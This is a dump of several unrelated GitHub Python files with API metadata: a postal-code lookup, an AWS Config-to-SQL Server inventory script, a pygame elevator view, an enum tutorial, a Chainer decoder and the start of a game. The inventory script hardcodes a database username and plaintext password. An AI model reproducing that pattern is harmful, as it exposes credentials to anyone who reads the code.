"attr.ib", "line_number": 77, "usage_type": "call"}, {"api_name": "attr.Factory", "line_number": 77, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 78, "usage_type": "call"}, {"api_name": "attr.Factory", "line_number": 78, "usage_type": "call"}, {"api_name": "txacme.util.clock_now", "line_number": 85, "usage_type": "call"}, {"api_name": "pem.Certificate", "line_number": 100, "usage_type": "argument"}, {"api_name": "cryptography.x509.load_pem_x509_certificate", "line_number": 101, "usage_type": "call"}, {"api_name": "cryptography.x509", "line_number": 101, "usage_type": "name"}, {"api_name": "cryptography.hazmat.backends.default_backend", "line_number": 102, "usage_type": "call"}, {"api_name": "twisted.internet.defer.gatherResults", "line_number": 116, "usage_type": "call"}, {"api_name": "twisted.internet.defer.gatherResults", "line_number": 122, "usage_type": "call"}, {"api_name": "twisted.internet.defer.gatherResults", "line_number": 130, "usage_type": "call"}, {"api_name": "twisted.internet.defer.Deferred", "line_number": 166, "usage_type": "call"}, {"api_name": "pem.Key", "line_number": 194, "usage_type": "call"}, {"api_name": "cryptography.hazmat.primitives.serialization.Encoding", "line_number": 195, "usage_type": "attribute"}, {"api_name": "cryptography.hazmat.primitives.serialization", "line_number": 195, "usage_type": "name"}, {"api_name": "cryptography.hazmat.primitives.serialization.PrivateFormat", "line_number": 196, "usage_type": "attribute"}, {"api_name": "cryptography.hazmat.primitives.serialization", "line_number": 196, "usage_type": "name"}, {"api_name": "cryptography.hazmat.primitives.serialization.NoEncryption", "line_number": 197, "usage_type": "call"}, {"api_name": "cryptography.hazmat.primitives.serialization", "line_number": 197, "usage_type": "name"}, {"api_name": "txacme.client.poll_until_valid", "line_number": 202, "usage_type": "call"}, {"api_name": "txacme.util.tap", "line_number": 203, "usage_type": "call"}, {"api_name": "txacme.client.answer_challenge", "line_number": 205, "usage_type": "call"}, {"api_name": "pem.Certificate", "line_number": 210, "usage_type": "call"}, {"api_name": "cryptography.x509.load_der_x509_certificate", "line_number": 211, "usage_type": "call"}, {"api_name": "cryptography.x509", "line_number": 211, "usage_type": "name"}, {"api_name": "cryptography.hazmat.backends.default_backend", "line_number": 212, "usage_type": "call"}, {"api_name": "cryptography.hazmat.primitives.serialization.Encoding", "line_number": 213, "usage_type": "attribute"}, {"api_name": "cryptography.hazmat.primitives.serialization", "line_number": 213, "usage_type": "name"}, {"api_name": "txacme.client.fqdn_identifier", "line_number": 225, "usage_type": "call"}, {"api_name": "txacme.messages.CertificateRequest", "line_number": 228, "usage_type": "call"}, {"api_name": "txacme.util.csr_for_names", "line_number": 229, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 233, "usage_type": "call"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 240, "usage_type": "call"}, {"api_name": "acme.messages.NewRegistration.from_data", "line_number": 251, "usage_type": "call"}, {"api_name": "acme.messages.NewRegistration", "line_number": 251, "usage_type": "attribute"}, {"api_name": "acme.messages", "line_number": 251, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 273, "usage_type": "call"}, {"api_name": "twisted.internet.defer.Deferred", "line_number": 274, "usage_type": "call"}, {"api_name": "twisted.application.service.Service.startService", "line_number": 279, "usage_type": "call"}, {"api_name": "twisted.application.service.Service", "line_number": 279, "usage_type": "name"}, {"api_name": "twisted.application.internet.TimerService", "line_number": 281, "usage_type": "call"}, {"api_name": "twisted.application.service.Service.stopService", "line_number": 287, "usage_type": "call"}, {"api_name": "twisted.application.service.Service", "line_number": 287, "usage_type": "name"}, {"api_name": "attr.s", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "17935643778", "text": "#!/usr/bin/python3\n\n\n# 郵便番号で住所を出す\nimport requests, json\n\n\n# api\ndef getURL(post_code):\n return 'http://zipcloud.ibsnet.co.jp/api/search?zipcode={}'.format(post_code)\n\n\n# Jsonを読む\ndef readJson(url):\n r = requests.get(url)\n data = json.loads(r.text)\n return data\n\n\n# 情報を取得\ndef getInfo(data):\n if not (data['results'] == None):\n return [data['results'][0]['zipcode'],\n data['results'][0]['address1'],\n data['results'][0]['address2'],\n data['results'][0]['address3']]\n else:\n return 'Nothing'\n\n\n# 最終的な表示\ndef showInfo(info):\n if not (info == 'Nothing'):\n display('郵便番号{}は{}{}{}です.'.format(info[0], info[1], info[2], info[3]))\n else:\n display('その郵便番号は存在しません.')\n\n\n# 表示\ndef display(d):\n print(d)\n\n\n# 実行\nif __name__ == '__main__':\n while True:\n try:\n post_code = int(input('郵便番号を入力してください(例1234567): '))\n showInfo(getInfo(readJson(getURL(post_code))))\n break\n except ValueError:\n display('ERROR')\n break\n", "repo_name": "n18001/life_hack", "sub_path": "post_code.py", "file_name": "post_code.py", "file_ext": "py", "file_size_in_byte": 1189, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 15, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "27533644479", "text": "import json\nfrom pprint import pprint\nimport boto3\nimport pyodbc\nimport os\nimport gzip\nimport shutil\nimport subprocess as sp\n\n\nserver='SD-AE79-EF8E\\HCSQLSERVER1,2431'\ndatabase='hybrid_cloud'\nusername = 'testuser'\npassword ='TestingSQL@1234'\ndriver = '/opt/microsoft/msodbcsql17/lib64/libmsodbcsql-17.2.so.0.1'\nconnection = pyodbc.connect('DRIVER='+driver+';SERVER='+server+';PORT=2431;DATABASE='+database+';UID='+username+';PWD='+password)\ncursor = connection.cursor()\nbucket = \"config-bucket-528884874493\"\nwork_dir = \"\"\n\n\ndef download_objects(bucket, work_dir):\n command = \"aws s3 cp --recursive s3://%s %s\" %(bucket, work_dir)\n sp.Popen(command).wait()\n print('All Objects Downloaded')\n\ndef get_all_file_paths(directory): \n \n # initializing empty file paths list \n file_paths = [] \n \n # crawling through directory and subdirectories \n for root, directories, files in os.walk(directory): \n for filename in files: \n # join the two strings in order to form the full filepath. \n filepath = os.path.join(root, filename) \n file_paths.append(filepath) \n \n # returning all file paths \n return file_paths\n\ndef unzip_files(file_paths):\n for files in file_paths:\n if files.endswith('.gz'):\n with gzip.open(files, 'rb') as f_in:\n file_name_json = files[0:-3]\n with open(file_name_json, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n os.remove(files)\n\ndef main():\n download_objects(bucket, work_dir)\n file_paths = get_all_file_paths('.')\n unzip_files(file_paths)\n file_paths2 = get_all_file_paths('.')\n for file in file_paths2:\n if file.endswith('.json'):\n with open (file, 'r') as json_file:\n try:\n json_obj = json.load(json_file)\n json_str = json_obj['configurationItems']\n new_dict = {}\n for i in json_str:\n new_dict['dBInstanceIdentifier'] = i['configuration']['dBInstanceIdentifier']\n new_dict['dBInstanceClass'] = i['configuration']['dBInstanceClass']\n new_dict['dBInstanceStatus'] = i['configuration']['dBInstanceStatus']\n new_dict['dbiResourceId'] = i['configuration']['dbiResourceId']\n new_dict['configurationItemCaptureTime'] = i['configurationItemCaptureTime']\n new_dict['dBInstanceArn'] = i['configuration']['dBInstanceArn']\n new_dict['instanceCreateTime'] = i['configuration']['instanceCreateTime']\n new_dict['resourceId'] = i['resourceId']\n new_dict['awsAccountId'] = i['awsAccountId']\n try:\n cursor.execute(\"insert into Inventory_awsrds(resourceId, dBInstanceClass, dBInstanceStatus, configurationItemCaptureTime, dBInstanceArn, dBInstanceIdentifier) values (?,?,?,?,?,?)\",str(new_dict['resourceId']),str(new_dict['dBInstanceClass']),str(new_dict['dBInstanceStatus']),str(new_dict['configurationItemCaptureTime']),str(new_dict['dBInstanceArn']),str(new_dict['dBInstanceIdentifier']))\n except Exception as e:\n print(e)\n except Exception as e:\n print(e)\n os.remove(file)\n\nmain()\nconnection.commit()\nconnection.close()\n#file = \"546156050725_Config_us-east-1_ConfigHistory_AWS__RDS__DBInstance_20190122T113622Z_20190122T113622Z_1.json\"\n#with open (file, 'r') as json_file:\n #json_obj = json.load(json_file)\n #json_str = json_obj['configurationItems']\n #for i in json_str:\n #print(i['configurationItemCaptureTime'])\n #break\n\n", "repo_name": "the-indian-saint/AWS-Scripts", "sub_path": "DynamoDB/Working/rds.py", "file_name": "rds.py", "file_ext": "py", "file_size_in_byte": 3781, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyodbc.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 24, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 45, "usage_type": "call"}, {"api_name": "shutil.copyfileobj", "line_number": 48, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 49, "usage_type": "call"}, {"api_name": "json.load", "line_number": 60, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "18163344335", "text": "import pygame\nimport pygame.locals\nfrom .elevator import Elevator\n\npygame.init()\n\n\nclass ElevatorUI:\n background = pygame.Color(\"white\")\n elevator_image = None\n\n def __init__(self, ui, elevator: Elevator, rect):\n self.ui = ui\n self.elevator = elevator\n self.rect = rect\n if self.elevator_image is None:\n self.elevator_image = pygame.transform.scale(\n pygame.image.load(\"images/elevator.png\"),\n (self.rect.width - 10, self.rect.width - 10)\n )\n\n def draw(self, surface):\n pygame.draw.rect(surface, self.background, self.rect)\n\n elevation = self.elevator.elevation/self.ui.controller.floors[-1].elevation\n elevator_rect = self.elevator_image.get_rect()\n x = self.rect.left + 5\n y = self.rect.top + int((self.rect.height-elevator_rect.height)*(1-elevation))\n surface.blit(self.elevator_image, elevator_rect.move(x, y))\n\n def click(self, surface, point):\n pass\n", "repo_name": "xajohnson/pyelevator", "sub_path": "pyelevator/elevatorui.py", "file_name": "elevatorui.py", "file_ext": "py", "file_size_in_byte": 1068, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygame.init", "line_number": 5, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 9, "usage_type": "call"}, {"api_name": "elevator.Elevator", "line_number": 12, "usage_type": "name"}, {"api_name": "pygame.transform.scale", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 23, "usage_type": "attribute"}]} +{"seq_id": "9578343711", "text": "# 为枚举类型定义一个class类型,然后,每个常量都是class的一个唯一实例。Python提供了Enum类来实现这个功能\r\n\r\nfrom enum import Enum\r\n\r\nMonth = Enum('Month', ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'))\r\n\r\n# 这样就获得了Month类型的枚举类,可以直接使用Month.Jan来引用一个常量,或者枚举它的所有成员:\r\nfor name, member in Month.__members__.items():\r\n print(name, '=>', member, ',', member.value) # value属性则是自动赋给成员的int常量,默认从1开始计数。\r\n\r\n\r\nfrom enum import Enum, unique # 如果需要更精确地控制枚举类型,可以从Enum派生出自定义类:\r\n\r\n\r\n@unique # @unique装饰器可以帮助我们检查保证没有重复值\r\nclass Weekday(Enum):\r\n Sun = 0\r\n Mon = 1\r\n Tue = 2\r\n Wed = 3\r\n Thu = 4\r\n Fri = 5\r\n Sat = 6\r\n\r\n# 访问这些枚举类型可以有若干种方法,既可以用成员名称引用枚举常量,又可以直接根据value的值获得枚举常量。\r\nday1 = Weekday.Mon\r\n\r\nprint('day1 =', day1)\r\nprint('Weekday.Tue =', Weekday.Tue)\r\nprint('Weekday[\\'Tue\\'] =', Weekday['Tue'])\r\nprint('Weekday.Tue.value =', Weekday.Tue.value)\r\nprint('day1 == Weekday.Mon ?', day1 == Weekday.Mon)\r\nprint('day1 == Weekday.Tue ?', day1 == Weekday.Tue)\r\nprint('day1 == Weekday(1) ?', day1 == Weekday(1))\r\n\r\nfor name, member in Weekday.__members__.items():\r\n print(name, '=>', member)", "repo_name": "zx-feishang/LearningPython3-begin-", "sub_path": "6 OOP/O15enum_class.py", "file_name": "O15enum_class.py", "file_ext": "py", "file_size_in_byte": 1472, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "enum.Enum", "line_number": 5, "usage_type": "call"}, {"api_name": "enum.Enum", "line_number": 16, "usage_type": "name"}, {"api_name": "enum.unique", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "40041493556", "text": "#!/usr/bin/env python\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport chainer\nimport numpy as np\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer import Variable, Chain, ChainList\nimport six\n\nfrom nmt_chainer.models.feedforward.utils import (\n generate_pos_vectors, make_batch_mask, pad_data, FeedForward, apply_linear_layer_to_last_dims, cut_minibatch)\nfrom nmt_chainer.models.feedforward.multi_attention import AddAndNormalizedSelfAttentionLayer, AddAndNormalizedCrossAttentionLayer\n\nimport logging\nlogging.basicConfig()\nlog = logging.getLogger(\"ff:dec\")\nlog.setLevel(logging.INFO)\n\nclass DecoderLayer(Chain):\n def __init__(self, d_model, n_heads, d_ff=2048, experimental_relu=False, dropout=None,\n residual_mode=\"normal\", no_normalize=False):\n super(DecoderLayer, self).__init__(\n ff_layer = FeedForward(d_model, d_ff=d_ff, dropout=dropout, residual_mode=residual_mode, no_normalize=no_normalize),\n self_attention_layer = AddAndNormalizedSelfAttentionLayer(d_model=d_model, n_heads=n_heads,\n experimental_relu=experimental_relu,\n dropout=dropout, residual_mode=residual_mode, no_normalize=no_normalize),\n \n cross_attention_layer = AddAndNormalizedCrossAttentionLayer(d_model=d_model, n_heads=n_heads,\n experimental_relu=experimental_relu,\n dropout=dropout, \n residual_mode=residual_mode if residual_mode != \"none\" else \"normal\", no_normalize=no_normalize) # Does not seem good to not let the cross attention be bypassed\n )\n \n self.n_heads = n_heads\n self.d_model = d_model\n \n def __call__(self, tgt, src, mask, mask_input):\n y1 = self.self_attention_layer(tgt, mask)\n y2 = self.cross_attention_layer(y1, src, mask_input)\n y3 = self.ff_layer(y2)\n return y3\n \n def one_step(self, new_inpt, prev_states, src, mask_input):\n mb_size_inpt, nQ_inpt, d_model_inpt = new_inpt.data.shape\n assert nQ_inpt == 1\n assert d_model_inpt == self.d_model\n \n mb_size_mask_input, n_heads_mask_input, nQ_mask_input, nV_mask_input = mask_input.shape\n assert mb_size_mask_input == mb_size_inpt\n assert nQ_mask_input == 1\n assert n_heads_mask_input == self.n_heads\n \n mb_size_src, max_length_src, d_model_src = src.data.shape\n assert max_length_src == nV_mask_input\n assert mb_size_src == mb_size_inpt\n \n# assert mask.shape == (mb_size_inpt, self.n_heads, 1, )\n if prev_states is not None:\n prev_self_attn, prev_cross_attn = prev_states\n full_tgt = F.concat((prev_self_attn, new_inpt) , axis=1)\n else:\n full_tgt = new_inpt\n \n y1_last = self.self_attention_layer(full_tgt, mask = None, only_last=True)\n \n if prev_states is not None:\n full_y1 = F.concat((prev_cross_attn, y1_last) , axis=1)\n else:\n full_y1 = y1_last\n \n y2_last = self.cross_attention_layer(full_y1, src, mask_input, only_last=True)\n y3_last = self.ff_layer(y2_last)\n return y3_last, (full_tgt, full_y1)\n \nclass DecoderMultiLayer(ChainList):\n def __init__(self, d_model, n_heads, d_ff=2048, experimental_relu=False, dropout=None, nb_layers=6,\n residual_mode=\"normal\", no_normalize=False):\n super(DecoderMultiLayer, self).__init__()\n for _ in six.moves.range(nb_layers):\n self.add_link(DecoderLayer(d_model, n_heads, d_ff=d_ff, experimental_relu=experimental_relu, dropout=dropout,\n residual_mode=residual_mode, no_normalize=no_normalize))\n \n def __call__(self, tgt, src, mask, mask_input):\n for link in self:\n tgt = link(tgt, src, mask, mask_input)\n return tgt\n \n def one_step(self, new_inpt, prev_states, src, mask_input):\n assert prev_states is None or len(prev_states) == len(self)\n new_prev_tgt = []\n tgt_last = new_inpt\n for num_link, link in enumerate(self):\n tgt_last, this_prev_tgt = link.one_step(tgt_last, prev_states[num_link] if prev_states is not None else None, src, mask_input)\n new_prev_tgt.append(this_prev_tgt)\n return tgt_last, tuple(new_prev_tgt) \n \n# class FakeDecoderMultiLayer(Chain):\n# def __init__(self, d_model, n_heads, d_ff=2048, experimental_relu=False, dropout=None, nb_layers=6,\n# no_add=False, no_normalize=False):\n# super(DecoderMultiLayer, self).__init__( \n# ff_layer1 = FeedForward(d_model, d_ff=d_ff, dropout=dropout, no_add=no_add, no_normalize=no_normalize),\n# self_attention_layer1 = AddAndNormalizedSelfAttentionLayer(d_model=d_model, n_heads=n_heads,\n# experimental_relu=experimental_relu,\n# dropout=dropout, no_add=no_add, no_normalize=no_normalize),\n# ff_layer2 = FeedForward(d_model, d_ff=d_ff, dropout=dropout, no_add=no_add, no_normalize=no_normalize),\n# self_attention_layer2 = AddAndNormalizedSelfAttentionLayer(d_model=d_model, n_heads=n_heads,\n# experimental_relu=experimental_relu,\n# dropout=dropout, no_add=no_add, no_normalize=no_normalize),\n# ff_layer3 = FeedForward(d_model, d_ff=d_ff, dropout=dropout, no_add=no_add, no_normalize=no_normalize),\n# self_attention_layer3 = AddAndNormalizedSelfAttentionLayer(d_model=d_model, n_heads=n_heads,\n# experimental_relu=experimental_relu,\n# dropout=dropout, no_add=no_add, no_normalize=no_normalize)\n# )\n# \n# def __call__(self, tgt, src, mask, mask_input, train=True):\n# y1 = self.ff_layer1(self.self_attention_layer1(tgt, mask))\n# y2 = self.ff_layer2(self.self_attention_layer2(y1, mask))\n# y3 = self.ff_layer3(self.self_attention_layer3(y2, mask))\n# return y3\n# \n# def one_step(self, new_inpt, prev_states, src, mask_input, train=True):\n# assert prev_states is None or len(prev_states) == len(self)\n# new_prev_tgt = []\n# tgt_last = new_inpt\n# for num_link, link in enumerate(self):\n# tgt_last, this_prev_tgt = link.one_step(tgt_last, prev_states[num_link] if prev_states is not None else None, src, mask_input, train=train)\n# new_prev_tgt.append(this_prev_tgt)\n# return tgt_last, tuple(new_prev_tgt) \n \nclass DecoderState(object):\n def __init__(self, pos, prev_states):\n self.pos = pos\n self.prev_states = prev_states\n self.mb_size = self.prev_states[0][0].data.shape[0]\n assert [st.data.shape[0] == self.mb_size for state_group in prev_states for st in state_group]\n assert isinstance(pos, int) and pos >= -1\n \n def get_mb_size(self):\n return self.mb_size\n \n def reduce_to_minibatch_size(self, new_minibatch_size):\n assert new_minibatch_size <= self.mb_size\n if new_minibatch_size == self.mb_size:\n return self\n else:\n splitted_states = []\n for state_group in self.prev_states:\n splitted_states.append(\n tuple(cut_minibatch(st, new_minibatch_size) for st in state_group)\n )\n return DecoderState(self.pos, tuple(splitted_states))\n \n def get_states(self):\n return self.prev_states\n \n def get_pos(self):\n return self.pos\n \nclass ConditionalizedDecoderCell(object):\n def __init__(self, decoder_chain, src_encoding, mask_input):\n self.decoder_chain = decoder_chain\n self.src_encoding = src_encoding\n src_mb_size, src_max_length, src_d_model = src_encoding.data.shape\n self.src_mb_size = src_mb_size\n self.mask_input = mask_input\n \n def get_initial_logits(self, mb_size = None):\n if mb_size is None:\n mb_size = self.src_mb_size\n else:\n assert self.src_mb_size == 1\n assert mb_size is not None\n \n bos_encoding = F.broadcast_to(self.decoder_chain.bos_encoding, (mb_size, 1, self.decoder_chain.d_model))\n \n cross_mask = self.decoder_chain.xp.broadcast_to(self.mask_input[:,0:1,0:1,:], (self.mask_input.shape[0], self.decoder_chain.n_heads, 1, self.mask_input.shape[3]))\n \n final_layer, prev_states = self.decoder_chain.encoding_layers.one_step(bos_encoding, None,\n self.src_encoding, cross_mask)\n \n logits = self.decoder_chain.logits_layer(F.reshape(final_layer, (mb_size, self.decoder_chain.d_model)))\n return logits, DecoderState(pos=-1, prev_states=prev_states)\n \n def __call__(self, prev_decoder_state, inpt):\n current_mb_size = inpt.shape[0]\n# mask = np.zeros((current_mb_size, ), dtype = np.float32)\n# padded = np.zeros((current_mb_size, ), dtype = np.float32)\n# for num_batch, idx in enumerate(inpt):\n# padded[num_batch] = idx if idx is not None else 0\n# mask[num_batch] = 0 if idx is not None else -10000\n \n prev_decoder_state = prev_decoder_state.reduce_to_minibatch_size(current_mb_size)\n current_pos = prev_decoder_state.get_pos() + 1\n \n encoded = self.decoder_chain.emb(inpt)\n pos_vect = self.decoder_chain.get_one_pos_vect(current_mb_size, current_pos)\n \n encoded = encoded + pos_vect\n \n if self.decoder_chain.dropout is not None:\n encoded = F.dropout(encoded, self.decoder_chain.dropout)\n \n cross_mask = self.decoder_chain.xp.broadcast_to(\n self.mask_input[:,0:1,0:1,:], \n (self.mask_input.shape[0], self.decoder_chain.n_heads, 1, self.mask_input.shape[3]))\n \n final_layer, prev_states = self.decoder_chain.encoding_layers.one_step(encoded, prev_decoder_state.get_states(),\n self.src_encoding, cross_mask)\n \n# logits = apply_linear_layer_to_last_dims(final_layer, self.decoder_chain.logits_layer)\n logits = self.decoder_chain.logits_layer(F.reshape(final_layer, (current_mb_size, self.decoder_chain.d_model)))\n return logits, DecoderState(pos=current_pos, prev_states=prev_states)\n \nclass Decoder(Chain):\n def __init__(self, V, d_model=512, n_heads=8, d_ff=2048, experimental_relu=False, dropout=None, nb_layers=6,\n residual_mode=\"normal\", no_normalize=False):\n super(Decoder, self).__init__(\n emb = L.EmbedID(V, d_model),\n encoding_layers = DecoderMultiLayer(d_model, n_heads, d_ff=d_ff,\n experimental_relu=experimental_relu, \n dropout=dropout, nb_layers=nb_layers,\n residual_mode=residual_mode, no_normalize=no_normalize),\n logits_layer = L.Linear(d_model, V + 1)\n )\n \n self.dropout = dropout\n self.n_heads = n_heads\n self.d_model = d_model\n self.cached_pos_vect = None\n \n self.add_param(\"bos_encoding\", (1, 1, d_model))\n self.bos_encoding.data[...] = np.random.randn(d_model)\n \n self.V = V\n self.eos_idx = V\n \n def get_device(self):\n if self.xp is np:\n return None\n else:\n return self.emb.W.data.device\n \n def move_np_array_to_correct_device(self, np_array):\n device = self.get_device()\n if device is None:\n return np_array\n else:\n return chainer.cuda.to_gpu(np_array, device=device)\n \n def get_conditionalized_cell(self, encoded_input, mask_input):\n return ConditionalizedDecoderCell(self, encoded_input, mask_input)\n \n \n def get_cached_pos_vect(self, length): \n if self.cached_pos_vect is None or self.cached_pos_vect.shape[0] < length:\n self.cached_pos_vect = generate_pos_vectors(self.d_model, length)\n self.cached_pos_vect = self.move_np_array_to_correct_device(self.cached_pos_vect)\n return self.cached_pos_vect\n \n def get_pos_vect(self, mb_size, length):\n cached_pos_vect = self.get_cached_pos_vect(length)\n# print self.cached_pos_vect[None, :length, :].shape, mb_size, length, self.d_model\n return self.xp.broadcast_to(cached_pos_vect[None, :length, :], (mb_size, length, self.d_model))\n \n def get_one_pos_vect(self, mb_size, pos):\n cached_pos_vect = self.get_cached_pos_vect(pos+1)\n return self.xp.broadcast_to(cached_pos_vect[None, pos:pos+1, :], (mb_size, 1, self.d_model))\n \n def make_batch(self, seq_list):\n padded_data = pad_data(seq_list, pad_value=0)\n seq_length = [len(x) + 1 for x in seq_list] #BOS\n max_length_1 = max(seq_length)\n max_length_2 = max_length_1\n mb_size = len(seq_list)\n mask = make_batch_mask(mb_size, self.n_heads, max_length_1, max_length_2, \n# key_seq_lengths=seq_length, #actually not needed\n future_mask=True,\n mask_value=-10000)\n \n padded_data = self.move_np_array_to_correct_device(padded_data)\n mask = self.move_np_array_to_correct_device(mask)\n \n return padded_data, mask\n \n def compute_logits(self, seq_list, encoded_input, mask_input):\n mb_size = len(seq_list)\n max_length_1 = max(len(x) for x in seq_list)\n x, mask = self.make_batch(seq_list)\n \n# print \"padded_data\", x\n# print \"mask\", mask\n \n assert self.xp.all(mask_input == self.xp.broadcast_to(mask_input[:,0:1,0:1,:], mask_input.shape))\n \n encoded = self.emb(x)\n encoded += self.get_pos_vect(mb_size, max_length_1)\n \n if self.dropout is not None:\n encoded = F.dropout(encoded, self.dropout)\n \n bos_plus_encoded = F.concat((F.broadcast_to(self.bos_encoding, (mb_size, 1, self.d_model)), encoded), axis=1)\n \n cross_mask = self.xp.broadcast_to(mask_input[:,0:1,0:1,:], (mask_input.shape[0], self.n_heads, bos_plus_encoded.data.shape[1], mask_input.shape[3]))\n \n final_layer = self.encoding_layers(bos_plus_encoded, encoded_input, mask, cross_mask)\n logits = apply_linear_layer_to_last_dims(final_layer, self.logits_layer)\n return logits\n \n def compute_loss(self, seq_list, encoded_input, mask_input, reduce=\"mean\"):\n logits = self.compute_logits(seq_list, encoded_input, mask_input)\n padded_target_with_eos = pad_data(seq_list, pad_value=-1, add_eos=self.eos_idx)\n padded_target_with_eos = self.move_np_array_to_correct_device(padded_target_with_eos)\n loss = F.softmax_cross_entropy(F.reshape(logits, (-1, self.V+1)), padded_target_with_eos.reshape(-1,), reduce=reduce)\n return loss\n \n", "repo_name": "fabiencro/knmt", "sub_path": "nmt_chainer/models/feedforward/decoder.py", "file_name": "decoder.py", "file_ext": "py", "file_size_in_byte": 15612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 46, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 18, "usage_type": "attribute"}, {"api_name": "chainer.Chain", "line_number": 20, "usage_type": "name"}, {"api_name": "nmt_chainer.models.feedforward.utils.FeedForward", "line_number": 24, "usage_type": "call"}, {"api_name": "nmt_chainer.models.feedforward.multi_attention.AddAndNormalizedSelfAttentionLayer", "line_number": 25, "usage_type": "call"}, {"api_name": "nmt_chainer.models.feedforward.multi_attention.AddAndNormalizedCrossAttentionLayer", "line_number": 29, "usage_type": "call"}, {"api_name": "chainer.functions.concat", "line_number": 61, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 61, "usage_type": "name"}, {"api_name": "chainer.functions.concat", "line_number": 68, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 68, "usage_type": "name"}, {"api_name": "chainer.ChainList", "line_number": 76, "usage_type": "name"}, {"api_name": "six.moves.range", "line_number": 80, "usage_type": "call"}, {"api_name": "six.moves", "line_number": 80, "usage_type": "attribute"}, {"api_name": "nmt_chainer.models.feedforward.utils.cut_minibatch", "line_number": 150, "usage_type": "call"}, {"api_name": "chainer.functions.broadcast_to", "line_number": 175, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 175, "usage_type": "name"}, {"api_name": "chainer.functions.reshape", "line_number": 182, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 182, "usage_type": "name"}, {"api_name": "chainer.functions.dropout", "line_number": 202, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 202, "usage_type": "name"}, {"api_name": "chainer.functions.reshape", "line_number": 212, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 212, "usage_type": "name"}, {"api_name": "chainer.Chain", "line_number": 215, "usage_type": "name"}, {"api_name": "chainer.links.EmbedID", "line_number": 219, "usage_type": "call"}, {"api_name": "chainer.links", "line_number": 219, "usage_type": "name"}, {"api_name": "chainer.links.Linear", "line_number": 224, "usage_type": "call"}, {"api_name": "chainer.links", "line_number": 224, "usage_type": "name"}, {"api_name": "numpy.random.randn", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 233, "usage_type": "attribute"}, {"api_name": "chainer.cuda.to_gpu", "line_number": 249, "usage_type": "call"}, {"api_name": "chainer.cuda", "line_number": 249, "usage_type": "attribute"}, {"api_name": "nmt_chainer.models.feedforward.utils.generate_pos_vectors", "line_number": 257, "usage_type": "call"}, {"api_name": "nmt_chainer.models.feedforward.utils.pad_data", "line_number": 271, "usage_type": "call"}, {"api_name": "nmt_chainer.models.feedforward.utils.make_batch_mask", "line_number": 276, "usage_type": "call"}, {"api_name": "chainer.functions.dropout", "line_number": 300, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 300, "usage_type": "name"}, {"api_name": "chainer.functions.concat", "line_number": 302, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 302, "usage_type": "name"}, {"api_name": "chainer.functions.broadcast_to", "line_number": 302, "usage_type": "call"}, {"api_name": "nmt_chainer.models.feedforward.utils.apply_linear_layer_to_last_dims", "line_number": 307, "usage_type": "call"}, {"api_name": "nmt_chainer.models.feedforward.utils.pad_data", "line_number": 312, "usage_type": "call"}, {"api_name": "chainer.functions.softmax_cross_entropy", "line_number": 314, "usage_type": "call"}, {"api_name": "chainer.functions", "line_number": 314, "usage_type": "name"}, {"api_name": "chainer.functions.reshape", "line_number": 314, "usage_type": "call"}]} +{"seq_id": "18829807849", "text": "# Author : Gary Godfrey\n# Date : 5th Oct 2021\n# Desc : The is the main program for the Alien Invasion project in\n# : Python Crash Course.\n#\n# Mods : 8th Oct - Shooting & destroying the aliens\n# : 8th Oct - Game Statistics\n# : 11th Oct - Game starting, stopping & scoring\n# : 22nd Oct - Getting creative and adding sounds additional to book\n# Added level to saved high score, and moved save to game_stats.py\n# Moved level on screen to match high-score format\n# : 25th Oct - Refactor _check_bullet_alien_colilsions to _start_new_level\n# self.sb.prep_ships() was called here instead of init in scoreboard\n# simplified image prep with new refactored scoreboard.prep_images\n\n# Standard library imports\n\n# Use the amazing traceback from the rich library to catch and show errors\n# much more clearly and easier to read.\nfrom rich.traceback import install\ninstall(show_locals=True)\n\nimport sys\nimport pygame.mouse\nimport pygame.sprite # Added to get intellisense to work for the 